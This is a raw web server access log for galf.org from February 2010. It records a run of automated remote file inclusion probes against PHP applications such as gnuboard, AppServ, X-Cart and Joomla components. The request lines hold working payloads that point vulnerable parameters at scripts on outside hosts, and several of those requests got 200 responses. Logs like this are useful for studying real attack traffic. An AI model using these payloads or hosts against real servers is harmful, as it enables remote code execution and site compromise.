216.104.46.66 - - [28/Feb/2010:21:07:41 -0800] "GET /logs/access_090928.log//bbs/include/print_category.php?setup%5Buse_category%5D=1&dir=http://www.sinaelee.com/lib/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.104.46.66 - - [28/Feb/2010:21:07:41 -0800] "GET /logs//bbs/include/print_category.php?setup%5Buse_category%5D=1&dir=http://www.sinaelee.com/lib/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.106.132.3 - - [28/Feb/2010:21:08:27 -0800] "GET /logs/access_091221.log//init_basic.php?GALLERY_BASEDIR=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.106.132.3 - - [28/Feb/2010:21:08:31 -0800] "GET /logs/access_091221.log//init_basic.php?GALLERY_BASEDIR=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.157.211.204 - - [28/Feb/2010:21:08:52 -0800] "GET /gnuboard4//bbs/delete_all.php?board.skin.path=http://www.partyandmoreevents.de/two?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "galf.org"
200.157.211.204 - - [28/Feb/2010:21:08:53 -0800] "GET /logs//gnuboard4//bbs/delete_all.php?board.skin.path=http://www.partyandmoreevents.de/two?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "galf.org"
200.157.211.204 - - [28/Feb/2010:21:08:53 -0800] "GET /gnuboard4//bbs/delete_all.php?board.skin.path=http://www.alst.ru/cmd??&u=x HTTP/1.1" 404 - "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "galf.org"
200.157.211.204 - - [28/Feb/2010:21:08:53 -0800] "GET /logs//gnuboard4//bbs/delete_all.php?board.skin.path=http://www.alst.ru/cmd??&u=x HTTP/1.1" 404 - "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "galf.org"
222.122.25.99 - - [28/Feb/2010:21:08:58 -0800] "GET /QUIThttp://www.kecschool.co.kr/upfiles/c055/tp??? HTTP/1.1" 404 - "-" "Mozilla/3.0 (OS/2; U)" "www.galf.org"
222.122.25.99 - - [28/Feb/2010:21:08:58 -0800] "GET /logs/QUIThttp://www.kecschool.co.kr/upfiles/c055/tp??? HTTP/1.1" 404 - "-" "Mozilla/3.0 (OS/2; U)" "www.galf.org"
216.104.46.66 - - [28/Feb/2010:21:09:40 -0800] "GET /logs/access_090810.log//bbs/include/print_category.php?setup%5Buse_category%5D=1&dir=http://www.sinaelee.com/lib/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.104.46.66 - - [28/Feb/2010:21:09:40 -0800] "GET /logs/access_090810.log//bbs/include/print_category.php?setup%5Buse_category%5D=1&dir=http://www.sinaelee.com/lib/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.200.203.11 - - [28/Feb/2010:21:10:50 -0800] "GET /logs/access_100118.log//appserv/main.php?appserv_root=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.200.203.11 - - [28/Feb/2010:21:10:52 -0800] "GET /logs/access_091019.log//appserv/main.php?appserv_root=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.200.203.11 - - [28/Feb/2010:21:10:52 -0800] "GET /logs/access_090928.log//appserv/main.php?appserv_root=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.200.203.11 - - [28/Feb/2010:21:11:03 -0800] "GET /logs/access_091019.log//appserv/main.php?appserv_root=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.200.203.11 - - [28/Feb/2010:21:11:03 -0800] "GET /logs/access_090928.log//appserv/main.php?appserv_root=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.200.203.11 - - [28/Feb/2010:21:11:17 -0800] "GET /logs/access_100118.log//appserv/main.php?appserv_root=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
95.25.163.181 - - [28/Feb/2010:21:11:34 -0800] "GET /logs/access_090406.log HTTP/1.0" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.galf.org"
200.157.211.204 - - [28/Feb/2010:21:12:35 -0800] "GET /gnuboard4//bbs/delete_all.php?board.skin.path=http://www.partyandmoreevents.de/two?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.galf.org"
200.157.211.204 - - [28/Feb/2010:21:12:35 -0800] "GET /gnuboard4//bbs/delete_all.php?board.skin.path=http://www.alst.ru/cmd??&u=x HTTP/1.1" 404 - "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.galf.org"
200.157.211.204 - - [28/Feb/2010:21:12:36 -0800] "GET /logs//gnuboard4//bbs/delete_all.php?board.skin.path=http://www.partyandmoreevents.de/two?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.galf.org"
200.157.211.204 - - [28/Feb/2010:21:12:37 -0800] "GET /logs//gnuboard4//bbs/delete_all.php?board.skin.path=http://www.alst.ru/cmd??&u=x HTTP/1.1" 404 - "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.galf.org"
77.240.113.151 - - [28/Feb/2010:21:13:17 -0800] "GET /gnuboard4//bbs/delete_all.php?board.skin.path=http://www.partyandmoreevents.de/two?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "galf.org"
77.240.113.151 - - [28/Feb/2010:21:13:17 -0800] "GET /logs//gnuboard4//bbs/delete_all.php?board.skin.path=http://www.partyandmoreevents.de/two?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "galf.org"
77.240.113.151 - - [28/Feb/2010:21:13:17 -0800] "GET /gnuboard4//bbs/delete_all.php?board.skin.path=http://www.alst.ru/cmd??&u=x HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "galf.org"
77.240.113.151 - - [28/Feb/2010:21:13:17 -0800] "GET /logs//gnuboard4//bbs/delete_all.php?board.skin.path=http://www.alst.ru/cmd??&u=x HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "galf.org"
87.230.93.144 - - [28/Feb/2010:21:13:52 -0800] "GET /logs//gnuboard4//bbs/delete_all.php?board.skin.path=http://www.partyandmoreevents.de/two?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "galf.org"
87.230.93.144 - - [28/Feb/2010:21:13:52 -0800] "GET /gnuboard4//bbs/delete_all.php?board.skin.path=http://www.partyandmoreevents.de/two?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "galf.org"
87.230.93.144 - - [28/Feb/2010:21:13:52 -0800] "GET /logs//gnuboard4//bbs/delete_all.php?board.skin.path=http://www.alst.ru/cmd??&u=x HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "galf.org"
87.230.93.144 - - [28/Feb/2010:21:13:52 -0800] "GET /gnuboard4//bbs/delete_all.php?board.skin.path=http://www.alst.ru/cmd??&u=x HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "galf.org"
211.232.45.121 - - [28/Feb/2010:21:15:10 -0800] "GET /index.php?sayfa=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.232.45.121 - - [28/Feb/2010:21:15:10 -0800] "GET /logs/access_090831.log%20%20/index.php?sayfa=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.232.45.121 - - [28/Feb/2010:21:15:10 -0800] "GET /logs/index.php?sayfa=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.232.45.121 - - [28/Feb/2010:21:15:47 -0800] "GET /logs/access_090831.log%20%20/index.php?sayfa=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.232.45.121 - - [28/Feb/2010:21:15:47 -0800] "GET /index.php?sayfa=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.232.45.121 - - [28/Feb/2010:21:15:47 -0800] "GET /logs/index.php?sayfa=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
165.132.30.11 - - [28/Feb/2010:21:16:22 -0800] "GET /appserv/main.php?appserv_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
165.132.30.11 - - [28/Feb/2010:21:16:22 -0800] "GET /logs//appserv/main.php?appserv_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
165.132.30.11 - - [28/Feb/2010:21:16:22 -0800] "GET /logs/access_100118.log%20%20//appserv/main.php?appserv_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.52.167.61 - - [28/Feb/2010:21:17:15 -0800] "GET /gnuboard4//bbs/delete_all.php?board.skin.path=http://www.partyandmoreevents.de/two?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "galf.org"
212.52.167.61 - - [28/Feb/2010:21:17:16 -0800] "GET /gnuboard4//bbs/delete_all.php?board.skin.path=http://www.alst.ru/cmd??&u=x HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "galf.org"
212.52.167.61 - - [28/Feb/2010:21:17:18 -0800] "GET /logs//gnuboard4//bbs/delete_all.php?board.skin.path=http://www.partyandmoreevents.de/two?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "galf.org"
212.52.167.61 - - [28/Feb/2010:21:17:20 -0800] "GET /logs//gnuboard4//bbs/delete_all.php?board.skin.path=http://www.alst.ru/cmd??&u=x HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "galf.org"
123.143.29.250 - - [28/Feb/2010:21:17:29 -0800] "GET /logs/access_090921.log%20%20//common/db.php?commonpath=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
123.143.29.250 - - [28/Feb/2010:21:17:29 -0800] "GET /common/db.php?commonpath=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
123.143.29.250 - - [28/Feb/2010:21:17:30 -0800] "GET /logs//common/db.php?commonpath=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.52.167.61 - - [28/Feb/2010:21:17:59 -0800] "GET /logs//gnuboard4//bbs/delete_all.php?board.skin.path=http://www.partyandmoreevents.de/two?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.galf.org"
212.52.167.61 - - [28/Feb/2010:21:17:59 -0800] "GET /logs//gnuboard4//bbs/delete_all.php?board.skin.path=http://www.alst.ru/cmd??&u=x HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.galf.org"
212.52.167.61 - - [28/Feb/2010:21:18:01 -0800] "GET /gnuboard4//bbs/delete_all.php?board.skin.path=http://www.partyandmoreevents.de/two?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.galf.org"
212.52.167.61 - - [28/Feb/2010:21:18:02 -0800] "GET /gnuboard4//bbs/delete_all.php?board.skin.path=http://www.alst.ru/cmd??&u=x HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.galf.org"
77.240.113.151 - - [28/Feb/2010:21:18:11 -0800] "GET /logs//gnuboard4//bbs/delete_all.php?board.skin.path=http://www.partyandmoreevents.de/two?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.galf.org"
77.240.113.151 - - [28/Feb/2010:21:18:11 -0800] "GET /logs//gnuboard4//bbs/delete_all.php?board.skin.path=http://www.alst.ru/cmd??&u=x HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.galf.org"
77.240.113.151 - - [28/Feb/2010:21:18:14 -0800] "GET /gnuboard4//bbs/delete_all.php?board.skin.path=http://www.alst.ru/cmd??&u=x HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.galf.org"
222.122.25.99 - - [28/Feb/2010:21:18:18 -0800] "GET /component/option,com_sitemap/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.kecschool.co.kr/upfiles/c055/tp??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "galf.org"
222.122.25.99 - - [28/Feb/2010:21:18:18 -0800] "GET /logs//component/option,com_sitemap/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.kecschool.co.kr/upfiles/c055/tp??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "galf.org"
121.101.214.54 - - [28/Feb/2010:21:18:57 -0800] "GET /appserv/main.php?appserv_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.101.214.54 - - [28/Feb/2010:21:18:58 -0800] "GET /logs/access_100118.log%20%20//appserv/main.php?appserv_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.101.214.54 - - [28/Feb/2010:21:18:58 -0800] "GET /logs//appserv/main.php?appserv_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.115.111.245 - - [28/Feb/2010:21:19:59 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:21:21:59 -0800] "GET /admin/auth.php?xcart_dir=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:21:21:59 -0800] "GET /logs/access_100118.log%20%20//admin/auth.php?xcart_dir=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:21:21:59 -0800] "GET /logs//admin/auth.php?xcart_dir=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:21:22:00 -0800] "GET /admin/auth.php?xcart_dir=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:21:22:00 -0800] "GET /logs/access_100118.log%20%20//admin/auth.php?xcart_dir=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:21:22:00 -0800] "GET /logs//admin/auth.php?xcart_dir=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:21:22:10 -0800] "GET /logs/access_100111.log%20%20//admin/auth.php?xcart_dir=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.92.215.78 - - [28/Feb/2010:21:22:10 -0800] "GET /logs/access_100118.log%20%20//ggambo7002_board/comment_modify.php?dir=http://smkn-13bdg.sch.id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.92.215.78 - - [28/Feb/2010:21:22:10 -0800] "GET /logs/access_100118.log%20%20//ggambo7002_board/comment_modify.php?dir=http://smkn-13bdg.sch.id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.92.215.78 - - [28/Feb/2010:21:22:10 -0800] "GET /ggambo7002_board/comment_modify.php?dir=http://smkn-13bdg.sch.id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.92.215.78 - - [28/Feb/2010:21:22:10 -0800] "GET /ggambo7002_board/comment_modify.php?dir=http://smkn-13bdg.sch.id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.92.215.78 - - [28/Feb/2010:21:22:10 -0800] "GET /logs//ggambo7002_board/comment_modify.php?dir=http://smkn-13bdg.sch.id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.92.215.78 - - [28/Feb/2010:21:22:10 -0800] "GET /logs//ggambo7002_board/comment_modify.php?dir=http://smkn-13bdg.sch.id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:21:22:11 -0800] "GET /logs/access_100111.log%20%20//admin/auth.php?xcart_dir=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.92.215.78 - - [28/Feb/2010:21:22:21 -0800] "GET /logs/access_091221.log%20%20//ggambo7002_board/comment_modify.php?dir=http://smkn-13bdg.sch.id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.92.215.78 - - [28/Feb/2010:21:22:25 -0800] "GET /logs/access_091221.log%20%20//ggambo7002_board/comment_modify.php?dir=http://smkn-13bdg.sch.id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
165.132.30.11 - - [28/Feb/2010:21:22:25 -0800] "GET /logs/access_091019.log//appserv/main.php?appserv_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
165.132.30.11 - - [28/Feb/2010:21:22:25 -0800] "GET /logs/access_090928.log//appserv/main.php?appserv_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:21:22:33 -0800] "GET /admin/auth.php?xcart_dir=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:21:22:33 -0800] "GET /logs/access_100111.log//admin/auth.php?xcart_dir=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:21:22:33 -0800] "GET /logs//admin/auth.php?xcart_dir=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:21:22:33 -0800] "GET /logs/access_100111.log//admin/auth.php?xcart_dir=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:21:22:33 -0800] "GET /admin/auth.php?xcart_dir=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:21:22:33 -0800] "GET /logs//admin/auth.php?xcart_dir=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:21:22:37 -0800] "GET /logs/access_090810.log//admin/auth.php?xcart_dir=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:21:22:39 -0800] "GET /logs/access_090810.log//admin/auth.php?xcart_dir=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.12.33.30 - - [28/Feb/2010:21:23:21 -0800] "GET /logs/access_100118.log///?_SERVER[DOCUMENT_ROOT]=http://www.sanvan.net/new/cok.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.12.33.30 - - [28/Feb/2010:21:23:21 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.sanvan.net/new/cok.txt??? HTTP/1.1" 200 4805 "-" "Mozilla/5.0" "www.galf.org"
85.12.33.30 - - [28/Feb/2010:21:23:22 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.sanvan.net/new/cok.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
85.12.33.30 - - [28/Feb/2010:21:23:26 -0800] "GET /logs/access_100118.log///?_SERVER[DOCUMENT_ROOT]=http://www.sanvan.net/new/cok.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.12.33.30 - - [28/Feb/2010:21:23:27 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.sanvan.net/new/cok.txt??? HTTP/1.1" 200 4805 "-" "Mozilla/5.0" "www.galf.org"
85.12.33.30 - - [28/Feb/2010:21:23:27 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.sanvan.net/new/cok.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
123.143.29.250 - - [28/Feb/2010:21:23:49 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
123.143.29.250 - - [28/Feb/2010:21:23:49 -0800] "GET /logs/access_090928.log%20%20//skin/zero_vote/error.php?dir=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
123.143.29.250 - - [28/Feb/2010:21:23:50 -0800] "GET /skin/zero_vote/error.php?dir=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.12.33.30 - - [28/Feb/2010:21:24:01 -0800] "GET /logs/access_090928.log///?_SERVER[DOCUMENT_ROOT]=http://www.sanvan.net/new/cok.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.12.33.30 - - [28/Feb/2010:21:24:06 -0800] "GET /logs/access_090928.log///?_SERVER[DOCUMENT_ROOT]=http://www.sanvan.net/new/cok.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.101.214.54 - - [28/Feb/2010:21:24:38 -0800] "GET /logs/access_091019.log//appserv/main.php?appserv_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.101.214.54 - - [28/Feb/2010:21:24:38 -0800] "GET /logs/access_090928.log//appserv/main.php?appserv_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.101.214.54 - - [28/Feb/2010:21:25:51 -0800] "GET /logs/access_091109.log//appserv/main.php?appserv_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.12.33.30 - - [28/Feb/2010:21:25:55 -0800] "GET /logs/access_100118.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.sanvan.net/new/cok.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
165.132.30.11 - - [28/Feb/2010:21:25:59 -0800] "GET /logs/access_100118.log//appserv/main.php?appserv_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
124.217.238.38 - - [28/Feb/2010:21:26:05 -0800] "GET /logs/access_100118.log//?_SERVER%5BDOCUMENT_ROOT%5D=http://www.ultratone.com.my/new/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
124.217.238.38 - - [28/Feb/2010:21:26:05 -0800] "GET /?_SERVER%5BDOCUMENT_ROOT%5D=http://www.ultratone.com.my/new/idxx.pdf??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
124.217.238.38 - - [28/Feb/2010:21:26:05 -0800] "GET /logs//?_SERVER%5BDOCUMENT_ROOT%5D=http://www.ultratone.com.my/new/idxx.pdf??? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "www.galf.org"
124.217.238.38 - - [28/Feb/2010:21:26:20 -0800] "GET /logs/access_100118.log//?_SERVER%5BDOCUMENT_ROOT%5D=http://www.ultratone.com.my/new/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
124.217.238.38 - - [28/Feb/2010:21:26:20 -0800] "GET /logs//?_SERVER%5BDOCUMENT_ROOT%5D=http://www.ultratone.com.my/new/idxx.pdf??? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "www.galf.org"
121.101.214.54 - - [28/Feb/2010:21:26:22 -0800] "GET /logs/access_100118.log//appserv/main.php?appserv_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
124.217.238.38 - - [28/Feb/2010:21:26:23 -0800] "GET /?_SERVER%5BDOCUMENT_ROOT%5D=http://www.ultratone.com.my/new/idxx.pdf??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
64.46.39.49 - - [28/Feb/2010:21:26:32 -0800] "GET /logs/access_100111.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
124.217.238.38 - - [28/Feb/2010:21:26:48 -0800] "GET /logs/access_090928.log//?_SERVER%5BDOCUMENT_ROOT%5D=http://www.ultratone.com.my/new/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.119.103.16 - - [28/Feb/2010:21:26:55 -0800] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.phimose-info.de/phimose-forum/Sources/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.119.103.16 - - [28/Feb/2010:21:26:55 -0800] "GET /logs/access_091221.log%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.phimose-info.de/phimose-forum/Sources/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.119.103.16 - - [28/Feb/2010:21:26:55 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.phimose-info.de/phimose-forum/Sources/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
124.217.238.38 - - [28/Feb/2010:21:26:55 -0800] "GET /logs/access_100118.log//?_SERVER%5BDOCUMENT_ROOT%5D=http://www.ultratone.com.my/new/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
124.217.238.38 - - [28/Feb/2010:21:26:55 -0800] "GET /?_SERVER%5BDOCUMENT_ROOT%5D=http://www.ultratone.com.my/new/idxx.pdf??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
